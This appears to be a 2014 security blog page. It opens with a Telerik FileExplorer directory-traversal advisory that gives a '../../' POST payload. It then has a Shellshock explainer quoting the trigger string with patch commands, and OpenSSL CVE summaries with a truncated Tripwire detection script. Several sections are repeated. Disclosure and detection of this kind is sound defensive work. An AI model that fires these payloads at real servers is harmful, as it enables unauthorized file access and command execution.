# Exploit Title: Telerik FileExplorer Directory Traversal
# Date: 12/11/2014
# Exploit Author: Kerz
# Vendor Homepage: www.telerik.com
# Software Link: http://www.telerik.com/products/aspnet-ajax.aspx
# Version: Q3 2014
# Tested on: Windows OS
# CVE: None
The malicuious user sends a malformed request that generates the file access up directories as follows:
http://target_URL/FileExplorer.aspx
[POST Data]
&__CALLBACKPARAM -> "path":"../../"
Thanks
Wednesday 12 November 2014
Thursday 30 October 2014
Penetration test sample report
It looks nice a pentest sample report.
http://www.offensive-security.com/penetration-testing-sample-report.pdf
http://www.offensive-security.com/penetration-testing-sample-report.pdf
Thursday 23 October 2014
Shellshock
Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
Point of the vulnerability: ':() { :; };'
How to fix
CentOS, Ubuntu, Linux systems
[yum]
yum update bash -y
[apt-get]
apt-get update; apt-get install --only-upgrade bash
[pacman]
pacman -Syu
OS X
[Brew]
brew update
brew install bash
sudo sh -c 'echo "/usr/local/bin/bash" >> /etc/shells'
chsh -s /usr/local/bin/bash
sudo mv /bin/bash /bin/bash-backup
sudo ln -s /usr/local/bin/bash /bin/bash
[MacPorts]
sudo port selfupdate
sudo port upgrade bash
How to fix
CentOS, Ubuntu, Linux systems
[yum]
yum update bash -y
[apt-get]
apt-get update; apt-get install --only-upgrade bash
[pacman]
pacman -Syu
OS X
[Brew]
brew update
brew install bash
sudo sh -c 'echo "/usr/local/bin/bash" >> /etc/shells'
chsh -s /usr/local/bin/bash
sudo mv /bin/bash /bin/bash-backup
sudo ln -s /usr/local/bin/bash /bin/bash
[MacPorts]
sudo port selfupdate
sudo port upgrade bash
Reference:
[gry/shellshock-scanner]
https://github.com/gry/shellshock-scanner
https://github.com/gry/shellshock-scanner/blob/master/shellshock_scanner.py
https://shellshocker.net/
Friday 13 June 2014
OpenSSL CCS Inject - TEST
A OpenSSL has many vulnerabilities currently.
Vulnerabilities:
CVE-2014-0224 (MitM)
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the "CCS Injection" vulnerability.
CVE-2014-0221 (DoS)
The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake.
CVE-2014-0195 (Remote Execute Code)
The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment.
CVE-2014-0198 (Remote Execute Code)
The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a buffer pointer during certain recursive calls, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via vectors that trigger an alert condition.
CVE-2010-5298 (Inject data, DoS)
Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment.
CVE-2014-3470 (DoS)
The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value.
Affected Versions:
OpenSSL 0.9.8 DTLS
OpenSSL 1.0.0 DTLS
OpenSSL 1.0.1 DTLS
Upgrade to:
0.9.8za Version
1.0.0m Version
1.0.1h Version
You could test your OpenSSL that has vulnerabilities.
Python code (CCS inject detection, test):
Reference:
- http://www.tripwire.com/state-of-security/incident-detection/detection-script-for-cve-2014-0224-openssl-cipher-change-spec-injection/
- http://www.openssl.org/news/secadv_20140605.txt
Thanks.
Vulnerabilities:
CVE-2014-0224 (MitM)
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the "CCS Injection" vulnerability.
CVE-2014-0221 (DoS)
The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake.
CVE-2014-0195 (Remote Execute Code)
The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment.
CVE-2014-0198 (Remote Execute Code)
The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a buffer pointer during certain recursive calls, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via vectors that trigger an alert condition.
CVE-2010-5298 (Inject data, DoS)
Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment.
CVE-2014-3470 (DoS)
The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value.
Affected Versions:
OpenSSL 0.9.8 DTLS
OpenSSL 1.0.0 DTLS
OpenSSL 1.0.1 DTLS
Upgrade to:
0.9.8za Version
1.0.0m Version
1.0.1h Version
You could test your OpenSSL that has vulnerabilities.
#!/bin/python
import sys
import socket
import time
import struct
if len(sys.argv)<2:
print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.2 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]" % (sys.argv[0])
quit()
else:
strHost = sys.argv[1]
if len(sys.argv)>2:
try:
iPort = int(sys.argv[2])
except:
print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.2\nUsage: %s <host> [port=443]" % (sys.argv[0])
quit()
else:
iPort = 443
print "***CVE-2014-0224 Detection Tool v0.2***\nBrought to you by Tripwire VERT (@TripwireVERT)"
dSSL = {
"SSLv3" : "\x03\x00",
"TLSv1" : "\x03\x01",
"TLSv1.1" : "\x03\x02",
"TLSv1.2" : "\x03\x03",
}
# The following is a complete list of ciphers for the SSLv3 family up to TLSv1.2
ssl3_cipher = dict()
ssl3_cipher['\x00\x00'] = "TLS_NULL_WITH_NULL_NULL"
ssl3_cipher['\x00\x01'] = "TLS_RSA_WITH_NULL_MD5"
ssl3_cipher['\x00\x02'] = "TLS_RSA_WITH_NULL_SHA"
ssl3_cipher['\x00\x03'] = "TLS_RSA_EXPORT_WITH_RC4_40_MD5"
ssl3_cipher['\x00\x04'] = "TLS_RSA_WITH_RC4_128_MD5"
ssl3_cipher['\x00\x05'] = "TLS_RSA_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x06'] = "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5"
ssl3_cipher['\x00\x07'] = "TLS_RSA_WITH_IDEA_CBC_SHA"
ssl3_cipher['\x00\x08'] = "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x09'] = "TLS_RSA_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x0a'] = "TLS_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x0b'] = "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x0c'] = "TLS_DH_DSS_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x0d'] = "TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x0e'] = "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x0f'] = "TLS_DH_RSA_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x10'] = "TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x11'] = "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x12'] = "TLS_DHE_DSS_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x13'] = "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x14'] = "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x15'] = "TLS_DHE_RSA_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x16'] = "TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x17'] = "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5"
ssl3_cipher['\x00\x18'] = "TLS_DH_anon_WITH_RC4_128_MD5"
ssl3_cipher['\x00\x19'] = "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x1a'] = "TLS_DH_anon_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x1b'] = "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x1c'] = "SSL_FORTEZZA_KEA_WITH_NULL_SHA"
ssl3_cipher['\x00\x1d'] = "SSL_FORTEZZA_KEA_WITH_FORTEZZA_CBC_SHA"
ssl3_cipher['\x00\x1e'] = "SSL_FORTEZZA_KEA_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x1E'] = "TLS_KRB5_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x1F'] = "TLS_KRB5_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x20'] = "TLS_KRB5_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x21'] = "TLS_KRB5_WITH_IDEA_CBC_SHA"
ssl3_cipher['\x00\x22'] = "TLS_KRB5_WITH_DES_CBC_MD5"
ssl3_cipher['\x00\x23'] = "TLS_KRB5_WITH_3DES_EDE_CBC_MD5"
ssl3_cipher['\x00\x24'] = "TLS_KRB5_WITH_RC4_128_MD5"
ssl3_cipher['\x00\x25'] = "TLS_KRB5_WITH_IDEA_CBC_MD5"
ssl3_cipher['\x00\x26'] = "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA"
ssl3_cipher['\x00\x27'] = "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA"
ssl3_cipher['\x00\x28'] = "TLS_KRB5_EXPORT_WITH_RC4_40_SHA"
ssl3_cipher['\x00\x29'] = "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5"
ssl3_cipher['\x00\x2A'] = "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5"
ssl3_cipher['\x00\x2B'] = "TLS_KRB5_EXPORT_WITH_RC4_40_MD5"
ssl3_cipher['\x00\x2C'] = "TLS_PSK_WITH_NULL_SHA"
ssl3_cipher['\x00\x2D'] = "TLS_DHE_PSK_WITH_NULL_SHA"
ssl3_cipher['\x00\x2E'] = "TLS_RSA_PSK_WITH_NULL_SHA"
ssl3_cipher['\x00\x2F'] = "TLS_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x30'] = "TLS_DH_DSS_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x31'] = "TLS_DH_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x32'] = "TLS_DHE_DSS_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x33'] = "TLS_DHE_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x34'] = "TLS_DH_anon_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x35'] = "TLS_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x36'] = "TLS_DH_DSS_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x37'] = "TLS_DH_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x38'] = "TLS_DHE_DSS_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x39'] = "TLS_DHE_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x3A'] = "TLS_DH_anon_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x3B'] = "TLS_RSA_WITH_NULL_SHA256"
ssl3_cipher['\x00\x3C'] = "TLS_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x3D'] = "TLS_RSA_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x3E'] = "TLS_DH_DSS_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x3F'] = "TLS_DH_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x40'] = "TLS_DHE_DSS_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x41'] = "TLS_RSA_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x42'] = "TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x43'] = "TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x44'] = "TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x45'] = "TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x46'] = "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x60'] = "TLS_RSA_EXPORT1024_WITH_RC4_56_MD5"
ssl3_cipher['\x00\x61'] = "TLS_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5"
ssl3_cipher['\x00\x62'] = "TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x63'] = "TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x64'] = "TLS_RSA_EXPORT1024_WITH_RC4_56_SHA"
ssl3_cipher['\x00\x65'] = "TLS_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA"
ssl3_cipher['\x00\x66'] = "TLS_DHE_DSS_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x67'] = "TLS_DHE_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x68'] = "TLS_DH_DSS_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x69'] = "TLS_DH_RSA_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x6A'] = "TLS_DHE_DSS_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x6B'] = "TLS_DHE_RSA_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x6C'] = "TLS_DH_anon_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x6D'] = "TLS_DH_anon_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x80'] = "TLS_GOSTR341094_WITH_28147_CNT_IMIT"
ssl3_cipher['\x00\x81'] = "TLS_GOSTR341001_WITH_28147_CNT_IMIT"
ssl3_cipher['\x00\x82'] = "TLS_GOSTR341094_WITH_NULL_GOSTR3411"
ssl3_cipher['\x00\x83'] = "TLS_GOSTR341001_WITH_NULL_GOSTR3411"
ssl3_cipher['\x00\x84'] = "TLS_RSA_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x85'] = "TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x86'] = "TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x87'] = "TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x88'] = "TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x89'] = "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x8A'] = "TLS_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x8B'] = "TLS_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x8C'] = "TLS_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x8D'] = "TLS_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x8E'] = "TLS_DHE_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x8F'] = "TLS_DHE_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x90'] = "TLS_DHE_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x91'] = "TLS_DHE_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x92'] = "TLS_RSA_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x93'] = "TLS_RSA_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x94'] = "TLS_RSA_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x95'] = "TLS_RSA_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x96'] = "TLS_RSA_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x97'] = "TLS_DH_DSS_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x98'] = "TLS_DH_RSA_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x99'] = "TLS_DHE_DSS_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x9A'] = "TLS_DHE_RSA_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x9B'] = "TLS_DH_anon_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x9C'] = "TLS_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\x9D'] = "TLS_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\x9E'] = "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\x9F'] = "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA0'] = "TLS_DH_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA1'] = "TLS_DH_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA2'] = "TLS_DHE_DSS_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA3'] = "TLS_DHE_DSS_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA4'] = "TLS_DH_DSS_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA5'] = "TLS_DH_DSS_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA6'] = "TLS_DH_anon_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA7'] = "TLS_DH_anon_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA8'] = "TLS_PSK_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA9'] = "TLS_PSK_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xAA'] = "TLS_DHE_PSK_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xAB'] = "TLS_DHE_PSK_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xAC'] = "TLS_RSA_PSK_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xAD'] = "TLS_RSA_PSK_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xAE'] = "TLS_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\xAF'] = "TLS_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\x00\xB0'] = "TLS_PSK_WITH_NULL_SHA256"
ssl3_cipher['\x00\xB1'] = "TLS_PSK_WITH_NULL_SHA384"
ssl3_cipher['\x00\xB2'] = "TLS_DHE_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\xB3'] = "TLS_DHE_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\x00\xB4'] = "TLS_DHE_PSK_WITH_NULL_SHA256"
ssl3_cipher['\x00\xB5'] = "TLS_DHE_PSK_WITH_NULL_SHA384"
ssl3_cipher['\x00\xB6'] = "TLS_RSA_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\xB7'] = "TLS_RSA_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\x00\xB8'] = "TLS_RSA_PSK_WITH_NULL_SHA256"
ssl3_cipher['\x00\xB9'] = "TLS_RSA_PSK_WITH_NULL_SHA384"
ssl3_cipher['\x00\xBA'] = "TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBB'] = "TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBC'] = "TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBD'] = "TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBE'] = "TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBF'] = "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xC0'] = "TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC1'] = "TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC2'] = "TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC3'] = "TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC4'] = "TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC5'] = "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\x00'] = "TLS_EMPTY_RENEGOTIATION_INFO_SCSV"
ssl3_cipher['\xc0\x01'] = "TLS_ECDH_ECDSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x02'] = "TLS_ECDH_ECDSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x03'] = "TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x04'] = "TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x05'] = "TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x06'] = "TLS_ECDHE_ECDSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x07'] = "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x08'] = "TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x09'] = "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x0a'] = "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x0b'] = "TLS_ECDH_RSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x0c'] = "TLS_ECDH_RSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x0d'] = "TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x0e'] = "TLS_ECDH_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x0f'] = "TLS_ECDH_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x10'] = "TLS_ECDHE_RSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x11'] = "TLS_ECDHE_RSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x12'] = "TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x13'] = "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x14'] = "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x15'] = "TLS_ECDH_anon_WITH_NULL_SHA"
ssl3_cipher['\xc0\x16'] = "TLS_ECDH_anon_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x17'] = "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x18'] = "TLS_ECDH_anon_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x19'] = "TLS_ECDH_anon_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x1A'] = "TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x1B'] = "TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x1C'] = "TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x1D'] = "TLS_SRP_SHA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x1E'] = "TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x1F'] = "TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x20'] = "TLS_SRP_SHA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x21'] = "TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x22'] = "TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x23'] = "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x24'] = "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x25'] = "TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x26'] = "TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x27'] = "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x28'] = "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x29'] = "TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x2A'] = "TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x2B'] = "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x2C'] = "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x2D'] = "TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x2E'] = "TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x2F'] = "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x30'] = "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x31'] = "TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x32'] = "TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x33'] = "TLS_ECDHE_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\xC0\x34'] = "TLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x35'] = "TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x36'] = "TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x37'] = "TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x38'] = "TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x39'] = "TLS_ECDHE_PSK_WITH_NULL_SHA"
ssl3_cipher['\xC0\x3A'] = "TLS_ECDHE_PSK_WITH_NULL_SHA256"
ssl3_cipher['\xC0\x3B'] = "TLS_ECDHE_PSK_WITH_NULL_SHA384"
ssl3_cipher['\xfe\xfe'] = "SSL_RSA_FIPS_WITH_DES_CBC_SHA"
ssl3_cipher['\xfe\xff'] = "SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xff\xe0'] = "SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xff\xe1'] = "SSL_RSA_FIPS_WITH_DES_CBC_SHA"
def getSSLRecords(strBuf):
lstRecords = []
if len(strBuf)>=9:
sslStatus = struct.unpack('>BHHI', strBuf[0:9])
iType = (sslStatus[3] & (0xFF000000))>>24
iRecordLen = sslStatus[3] & (0x00FFFFFF)
iShakeProtocol = sslStatus[0]
iSSLLen = sslStatus[2]
#log(2,"iSSLLen == %d, len(strBuf) == %d, iRecordLen == %d",iSSLLen,len(strBuf),iRecordLen)
